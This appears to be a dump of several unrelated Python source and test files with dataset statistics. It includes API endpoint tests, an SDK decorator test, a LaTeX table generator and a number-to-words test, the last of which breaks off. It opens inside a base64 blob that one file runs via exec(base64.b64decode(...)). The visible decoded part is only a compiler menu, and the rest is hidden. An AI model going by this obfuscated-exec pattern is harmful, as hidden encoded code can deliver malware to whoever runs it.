W50KCJcMDMzWzE7MzJtRmlsZSBPayBobyBnYWkgaGE6IFwwMzNbMTszNm1IYXNpbF8iK2EpCgkJcHJpbnQKCWV4Y2VwdCBLZXlib2FyZEludGVycnVwdDoKCQlwcmludCgiXG5cMDMzWzE7MzFtWyFdIEVSUk9SOiBhcCBmaWxlcyBrbyB5YXFlZW5pIGJuYWluIGpvIGFwIGNvbXBpbGVkIG1haW4gY2hhaHR5IGhhaW4gICIpCgkJZXhpdCgpCgpvcy5zeXN0ZW0oJ2NsZWFyJykKcHJpbnQoYmFubmVyKQpwcmludCgiXDAzM1sxOzMybVsxXSBQeXRob24zIikKcHJpbnQoIlsyXSBQeXRob24yIikKYXNrPWlucHV0KCJcMDMzWzE7MzdtWz9dIFNsZWN0ICAgPT4gXDAzM1sxOzMybSIpCmlmIGFzayA9PSAnMSc6CglweSgpCmVsaWYgYXNrID09IDI6CglweTIoKQplbHNlOgoJcHJpbnQoIlxuXDAzM1sxOzMxbVshXSBJbnZhbGlkIikK'''))
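# The single-line exec(base64.b64decode(...)) above runs an opaque payload sight unseen.
# Decoding first and inspecting the plaintext before any exec() is the safer habit; a
# minimal sketch with a harmless stand-in payload (the blob below is hypothetical, not
# the one embedded above):

```python
import base64

payload = b"aW1wb3J0IG9z"                    # stand-in blob; decodes to "import os"
decoded = base64.b64decode(payload).decode("utf-8")
print(decoded)                               # inspect before ever passing it to exec()
```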
# File: tests/units/test_version_check_decorator.py (tomorrowdata/iottly-sdk-python, Apache-2.0)
import unittest
from iottly_sdk.utils import min_agent_version
from iottly_sdk.errors import InvalidAgentVersion
class TestVersionCheckDecorator(unittest.TestCase):
def setUp(self):
pass
def test_invalid_version_check_when_no_version_available(self):
class SDKStubClass:
def __init__(self):
self._agent_version = None
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
with self.assertRaises(InvalidAgentVersion) as e:
sdk.testMethod()
    def test_invalid_version_check_with_older_version(self):
class SDKStubClass:
def __init__(self):
self._agent_version = '0.9.5'
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
with self.assertRaises(InvalidAgentVersion) as e:
sdk.testMethod()
    def test_version_check_with_right_version(self):
class SDKStubClass:
def __init__(self):
self._agent_version = '1.0.0'
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
res = sdk.testMethod()
self.assertTrue(res)
    def test_version_check_with_newer_version(self):
class SDKStubClass:
def __init__(self):
self._agent_version = '1.2.4'
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
res = sdk.testMethod()
self.assertTrue(res)
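# The tests above pin down the decorator's contract: a missing or older agent version
# raises InvalidAgentVersion, an equal or newer version passes through. The real
# implementation lives in iottly_sdk.utils; the sketch below is an assumption that
# satisfies exactly these four tests (the tuple-based version comparison is illustrative,
# not the SDK's actual code):

```python
from functools import wraps

class InvalidAgentVersion(Exception):
    """Stand-in for iottly_sdk.errors.InvalidAgentVersion."""

def min_agent_version(required):
    required_parts = tuple(int(p) for p in required.split("."))

    def decorator(method):
        @wraps(method)
        def wrapper(self, *args, **kwargs):
            version = getattr(self, "_agent_version", None)
            if version is None:
                raise InvalidAgentVersion("agent version not available")
            if tuple(int(p) for p in version.split(".")) < required_parts:
                raise InvalidAgentVersion(
                    "agent %s < required %s" % (version, required))
            return method(self, *args, **kwargs)
        return wrapper
    return decorator

class SDKStub:
    def __init__(self, version):
        self._agent_version = version

    @min_agent_version("1.0.0")
    def test_method(self):
        return True

print(SDKStub("1.2.4").test_method())  # True
```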
# File: tests/endpoints/test_endpoints.py (botnetdobbs/StackOverflowLiteApi, CC0-1.0)
import unittest
from api import app
import json
from tests.modules_for_t import teardown
from api.create_tables import create_tables
from api.db import connect
class EndpointsTestCase(unittest.TestCase):
def setUp(self):
self.app = app
self.client = app.test_client
self.question = {
"title": "This is title 1",
"description": "This is description 1"
}
self.question1 = {
"title": "This is title 1",
"description": "This is description 2"
}
self.answer = {
"answer": "This is answer 1"
}
self.answer1 = {
"answer": "This is answer 2"
}
with self.app.app_context():
teardown()
def register_user(self):
user = {
"username": "username1",
"email" : "test@test.com",
"password": "password1"
}
return self.client().post('/api/v2/auth/register',
headers = {
"Content-Type" : 'application/json'},
data = json.dumps(user))
def login_user(self):
user = {
"username": "username1",
"password": "password1"
}
return self.client().post('/api/v2/auth/login',
headers =
{"Content-Type" : 'application/json'},
data=json.dumps(user))
def test_for_create_question(self):
#Register the user
self.register_user()
#Login the user and get the response
response = self.login_user()
#Get the access token
res = json.loads(response.data.decode())
access_token = res["access_token"]
# print(access_token)
#Post the question
create_question = self.client().post('/api/v2/questions',
headers = {"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
#Check the status code
self.assertEqual(create_question.status_code, 201)
#Check if the string exists in the resulting response
self.assertIn('Question created successfully.', str(create_question.data))
def test_for_get_all_questions(self):
#Register the user
self.register_user()
        #Login and get the response
response = self.login_user()
#Get the token
res = json.loads(response.data.decode())
access_token = res["access_token"]
#Add a question
add_question = self.client().post('/api/v2/questions',
headers = {
"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Get the questions, check the status code and if the string is in the response
get_questions = self.client().get('/api/v2/questions')
self.assertEqual(get_questions.status_code, 200)
self.assertIn('This is title 1', str(get_questions.data))
def test_for_find_question_by_id(self):
#Register a user and login(returns a response)
self.register_user()
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers = {
"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Get the question, check the status code and if the string is in the response
get_question = self.client().get('/api/v2/questions/1',
headers = {
"Authorization" : 'JWT ' + access_token})
self.assertEqual(get_question.status_code, 200)
self.assertIn('This is description 1', str(get_question.data))
def test_for_edit_question(self):
#Register a user and login(returns a response)
self.register_user()
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers = {"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Edit the question, check the status code and if the string is in the response
edit_question = self.client().put('api/v2/questions/1',
headers = {"Content-Type": "application/json",
"Authorization": "JWT " + access_token},
data = json.dumps(self.question1))
self.assertEqual(edit_question.status_code, 200)
self.assertIn('This is title 1', str(edit_question.data))
def test_for_delete_question(self):
#Register a user and login(returns a response)
self.register_user()
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers = {"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Delete the question, check the status code and if the string is in the response
delete_question = self.client().delete('/api/v2/questions/1',
headers = {"Authorization" : 'JWT ' + access_token})
self.assertEqual(delete_question.status_code, 201)
self.assertIn("Question deleted successfully.", str(delete_question.data))
def test_for_create_answer(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Add the answers, check the status code and if the string is in the response
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
self.assertIn('Answer inserted successfully', str(add_answer.data))
def test_for_get_all_answers(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Add the answer
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
#Check the status code
self.assertEqual(add_answer.status_code, 201)
#Get the answers and check the status code & the string in the response
get_answers = self.client().get('/api/v2/questions/1/answers')
self.assertEqual(get_answers.status_code, 200)
self.assertIn('This is answer 1', str(get_answers.data))
def test_for_get_single_answer(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Get the answer and check the status code & the string in the response
get_answer = self.client().get('/api/v2/questions/1/answers/1')
self.assertEqual(get_answer.status_code, 200)
self.assertIn('This is answer 1', str(get_answer.data))
def test_for_edit_answer(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Edit the answers and check the status code & the string in the response
edit_answer = self.client().put('/api/v2/questions/1/answers/1',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer1))
self.assertEqual(edit_answer.status_code, 201)
self.assertIn('updated', str(edit_answer.data))
def test_for_upvote_answer(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Upvote the answer and check the status code & the string in the response
upvote_answer = self.client().put('/api/v2/questions/1/answers/1/upvote',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(upvote_answer.status_code, 201)
self.assertIn('upvoted', str(upvote_answer.data))
def test_for_downvote_answer(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Downvote the answer and check the status code & the string in the response
downvote_answer = self.client().put('/api/v2/questions/1/answers/1/downvote',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(downvote_answer.status_code, 201)
self.assertIn('downvoted successfully', str(downvote_answer.data))
def test_for_delete_answer(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Delete the answer and check the status code & the string in the response
delete_answer = self.client().delete('/api/v2/questions/1/answers/1',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(delete_answer.status_code, 201)
self.assertIn('successfully', str(delete_answer.data))
def test_for_mark_answer_as_solved(self):
#Register a user and login(returns a response)
self.register_user()
        #Login and get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Mark the answer and check the status code & the string in the response
mark_answer = self.client().put('/api/v2/questions/1/answers/1/solved',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(mark_answer.status_code, 201)
self.assertIn('solution', str(mark_answer.data))
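    # Every test above repeats the same register -> login -> decode-token -> build-headers
    # boilerplate. A small helper would remove most of it; a sketch of the header-building
    # half, shown standalone so it runs without the Flask app (the response body below is a
    # hypothetical login payload, and jwt_headers is an illustrative name, not part of the
    # suite):

```python
import json

def jwt_headers(login_body: bytes) -> dict:
    """Build the Content-Type/Authorization headers the tests pass on every request."""
    token = json.loads(login_body.decode())["access_token"]
    return {"Content-Type": "application/json",
            "Authorization": "JWT " + token}

headers = jwt_headers(b'{"access_token": "abc123"}')
print(headers["Authorization"])  # JWT abc123
```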
if __name__ == "__main__":
    unittest.main()
# File: lib/table/get_sample.py (PEDIA-Charite/classifier, MIT)
#######################################################################################
# This script generates three LaTeX files.
# sample.tex and sample_gestalt.tex each contain three tables describing the samples.
# The difference between the two: sample.tex covers all samples, while
# sample_gestalt.tex only covers the samples that have a gestalt score in the
# pathogenic gene.
# sample_detail_no_g.tex lists the details of the samples that have no gestalt score
# in the pathogenic gene.
########################################################################################
import csv
import sys
import os
import collections
output_dir = '../../latex/table/'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
outFile = open(output_dir + 'sample.tex', "w")
filename = "../sample.csv"
#Output text
gene_list = {}
total_sample = 0
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1:
count = 0
if row[1] in gene_list:
count = gene_list[row[1]]
count += 1
gene_list.update({row[1]:count})
total_sample += 1
flag = 1
print(gene_list)
total_gene = len(gene_list)
print(total_sample)
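# The count-and-update loop above is what collections.Counter (already imported for
# OrderedDict) does in one call; a self-contained sketch with a hypothetical two-row
# CSV standing in for ../sample.csv:

```python
import collections
import csv
import io

csv_text = "case,gene,syndrome\nc1,PTPN11,Noonan syndrome\nc2,PTPN11,Noonan syndrome\n"
reader = csv.reader(io.StringIO(csv_text))
next(reader)                                  # skip the header row (the flag trick above)
gene_counts = collections.Counter(row[1] for row in reader)
print(gene_counts["PTPN11"], sum(gene_counts.values()))  # 2 2
```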
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|c|c|} \\hline\n")
outFile.write("Gene&Count\\\\ \\hline \n")
od = collections.OrderedDict(sorted(gene_list.items()))
for key, value in od.items():
outFile.write(key + "&" + str(value) + "\\\\ \\hline \n")
outFile.write(str(total_gene) + "&" + str(total_sample) + "\\\\ \\hline \n")
outFile.write("\\caption{summary table of mutation gene} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|p{12cm}|} \\hline\n")
outFile.write("Case&Gene&Syndrome\\\\ \\hline \n")
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1:
outFile.write("&".join(row[0:3]) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|c|c|c|c|c|} \\hline\n")
outFile.write("Case&Gene&FM&CADD&Gestalt&Boqa&Pheno\\\\ \\hline \n")
filename = "../sample.csv"
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
outrow = [j for i, j in enumerate(row) if i != 2]
if flag == 1:
outFile.write("&".join(outrow) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.close()
# For sample with gestalt
outFile = open(output_dir + 'sample_gestalt.tex', "w")
#Output text
gene_list = {}
total_sample = 0
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1 and row[5] != 'nan':
count = 0
if row[1] in gene_list:
count = gene_list[row[1]]
count += 1
gene_list.update({row[1]:count})
total_sample += 1
flag = 1
print(gene_list)
total_gene = len(gene_list)
print(total_sample)
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|c|c|} \\hline\n")
outFile.write("Gene&Count\\\\ \\hline \n")
od = collections.OrderedDict(sorted(gene_list.items()))
for key, value in od.items():
outFile.write(key + "&" + str(value) + "\\\\ \\hline \n")
outFile.write(str(total_gene) + "&" + str(total_sample) + "\\\\ \\hline \n")
outFile.write("\\caption{summary table of mutation gene with gestalt score} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|p{12cm}|} \\hline\n")
outFile.write("Case&Gene&Syndrome\\\\ \\hline \n")
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1 and row[5] != 'nan':
outFile.write("&".join(row[0:3]) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample with gestalt score} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|c|c|c|c|c|} \\hline\n")
outFile.write("Case&Gene&FM&CADD&Gestalt&Boqa&Pheno\\\\ \\hline \n")
filename = "../sample.csv"
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
outrow = [j for i, j in enumerate(row) if i != 2]
if flag == 1 and row[5] != 'nan':
outFile.write("&".join(outrow) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample with gestalt score} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.close()
#######################################################################
outFile = open(output_dir + 'sample_detail_no_g.tex', "w")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|c|c|c|c|c|}\n")
outFile.write("\\caption{Cases which has no gestalt score in pathogenic mutation gene} \n")
outFile.write("\\label{table:no_gestalt_sample} \\\\ \\hline \n")
outFile.write("Case&Gene&FM&CADD&Gestalt&Boqa&Pheno\\\\ \\hline \n")
filename = "../sample.csv"
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
outrow = [j for i, j in enumerate(row) if i != 2]
if flag == 1 and row[5] == 'nan':
outFile.write("&".join(outrow) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.close()
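Note that cell values are written into the LaTeX tables verbatim, so fields containing characters such as `&`, `%` or `_` would break compilation. A small escaping helper (hypothetical, not part of the original script) could be applied to each cell before joining:

```python
# Map LaTeX special characters to their escaped forms.
LATEX_SPECIALS = {"&": r"\&", "%": r"\%", "_": r"\_", "#": r"\#", "$": r"\$"}

def latex_escape(text: str) -> str:
    """Escape LaTeX special characters in a single table cell."""
    return "".join(LATEX_SPECIALS.get(ch, ch) for ch in text)
```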
| 31.299465 | 91 | 0.599009 | 817 | 5,853 | 4.238678 | 0.135863 | 0.180191 | 0.138897 | 0.060064 | 0.866301 | 0.816922 | 0.816922 | 0.797286 | 0.797286 | 0.797286 | 0 | 0.010594 | 0.177516 | 5,853 | 186 | 92 | 31.467742 | 0.708766 | 0.079276 | 0 | 0.885714 | 1 | 0.014286 | 0.298013 | 0.085898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.028571 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ba75cfa72a0a7a766fb14a4bae6f76eb4aa13480 | 98 | py | Python | scilifelab/utils/vcf.py | ssjunnebo/scilifelab | 79960f7042118f900bd1eaabe4902ee76abd8020 | [
"MIT"
] | 1 | 2016-03-21T14:04:09.000Z | 2016-03-21T14:04:09.000Z | scilifelab/utils/vcf.py | ssjunnebo/scilifelab | 79960f7042118f900bd1eaabe4902ee76abd8020 | [
"MIT"
] | 35 | 2015-01-22T08:25:02.000Z | 2020-02-17T12:09:12.000Z | scilifelab/utils/vcf.py | ssjunnebo/scilifelab | 79960f7042118f900bd1eaabe4902ee76abd8020 | [
"MIT"
] | 6 | 2015-01-16T15:32:08.000Z | 2020-01-30T14:34:40.000Z | """scilifelab vcf module"""
import os
def vcf_summary():
"""Do vcf_summary"""
pass
| 10.888889 | 27 | 0.591837 | 12 | 98 | 4.666667 | 0.75 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.255102 | 98 | 8 | 28 | 12.25 | 0.767123 | 0.367347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
ba924423bbd506a3b06b6a715a33c309b602553f | 4,211 | py | Python | ngenicpy/models/tune.py | parherman/ngenicpy | b4bd27c760adb14921d534f491263a5ecbf79abf | [
"MIT"
] | 6 | 2019-09-14T09:46:03.000Z | 2021-10-03T20:38:20.000Z | ngenicpy/models/tune.py | parherman/ngenicpy | b4bd27c760adb14921d534f491263a5ecbf79abf | [
"MIT"
] | 5 | 2019-12-19T07:31:55.000Z | 2021-02-01T19:23:02.000Z | ngenicpy/models/tune.py | parherman/ngenicpy | b4bd27c760adb14921d534f491263a5ecbf79abf | [
"MIT"
] | 4 | 2020-03-21T17:30:26.000Z | 2021-01-17T15:15:51.000Z | import json
from .base import NgenicBase
from .room import Room
from .node import Node
from ..const import API_PATH
class Tune(NgenicBase):
def __init__(self, session, json):
super(Tune, self).__init__(session=session, json=json)
def uuid(self):
"""Get the tune UUID"""
# If a tune was fetched with the list API, it contains "tuneUuid"
# If it was fetched directly (with UUID), it contains "uuid"
try:
return self["tuneUuid"]
except AttributeError:
return super().uuid()
def rooms(self):
"""List all Rooms associated with a Tune. A Room contains an indoor sensor.
:return:
a list of rooms
:rtype:
`list(~ngenic.models.room.Room)`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid="")
return self._parse_new_instance(url, Room, tune=self)
async def async_rooms(self):
"""List all Rooms associated with a Tune (async). A Room contains an indoor sensor.
:return:
a list of rooms
:rtype:
`list(~ngenic.models.room.Room)`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid="")
return await self._async_parse_new_instance(url, Room, tune=self)
def room(self, roomUuid):
"""Get data about a Room. A Room contains an indoor sensor.
:param str roomUuid:
(required) room UUID
:return:
the room
:rtype:
`~ngenic.models.room.Room`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid=roomUuid)
return self._parse_new_instance(url, Room, tune=self)
async def async_room(self, roomUuid):
"""Get data about a Room (async). A Room contains an indoor sensor.
:param str roomUuid:
(required) room UUID
:return:
the room
:rtype:
`~ngenic.models.room.Room`
"""
url = API_PATH["rooms"].format(tuneUuid=self.uuid(), roomUuid=roomUuid)
return await self._async_parse_new_instance(url, Room, tune=self)
def nodes(self):
"""List all Nodes associated with a Tune. A Node is a logical network entity.
:return:
a list of nodes
:rtype:
`list(~ngenic.models.node.Node)`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid="")
return self._parse_new_instance(url, Node, tune=self)
async def async_nodes(self):
"""List all Nodes associated with a Tune (async). A Node is a logical network entity.
:return:
a list of nodes
:rtype:
`list(~ngenic.models.node.Node)`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid="")
return await self._async_parse_new_instance(url, Node, tune=self)
def node(self, nodeUuid):
"""Get data about a Node. A Node is a logical network entity.
:param str nodeUuid:
(required) node UUID
:return:
the node
:rtype:
`~ngenic.models.node.Node`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid=nodeUuid)
return self._parse_new_instance(url, Node, tune=self)
async def async_node(self, nodeUuid):
"""Get data about a Node (async). A Node is a logical network entity.
:param str nodeUuid:
(required) node UUID
:return:
the node
:rtype:
`~ngenic.models.node.Node`
"""
url = API_PATH["nodes"].format(tuneUuid=self.uuid(), nodeUuid=nodeUuid)
return await self._async_parse_new_instance(url, Node, tune=self)
| 32.643411 | 93 | 0.588221 | 522 | 4,211 | 4.639847 | 0.12069 | 0.028902 | 0.037159 | 0.081751 | 0.854666 | 0.854666 | 0.854666 | 0.852601 | 0.807597 | 0.741536 | 0 | 0 | 0.299691 | 4,211 | 128 | 94 | 32.898438 | 0.821295 | 0.183092 | 0 | 0.5 | 0 | 0 | 0.02519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.125 | 0 | 0.575 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
babfd80dac481794c0354a430e6b988127baacaa | 4,624 | py | Python | hallo/test/modules/math/test_number_word.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2022-01-27T13:25:01.000Z | 2022-01-27T13:25:01.000Z | hallo/test/modules/math/test_number_word.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/math/test_number_word.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from hallo.events import EventMessage
def test_number_simple(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "five." == data[0].text, "Number word failing for small numbers."
def test_number_big(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 295228")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"two hundred and ninety-five thousand, two hundred and twenty-eight."
== data[0].text.lower()
)
def test_number_teen(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 17")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"seventeen." == data[0].text.lower()
), "Number word failing for 'teen' numbers."
def test_number_negative(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number -502")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"negative five hundred and two." == data[0].text.lower()
), "Number word failing for negative numbers."
def test_number_float(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 2.3")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"two point three" in data[0].text.lower()
), "Number word failing for non-integers."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 2.357")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"two point three five seven." == data[0].text.lower()
), "Number word failing for non-integers."
def test_number_american(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 1000000000 american")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"one billion." == data[0].text.lower()
), "Number word failing for american formatting."
def test_number_british(hallo_getter):
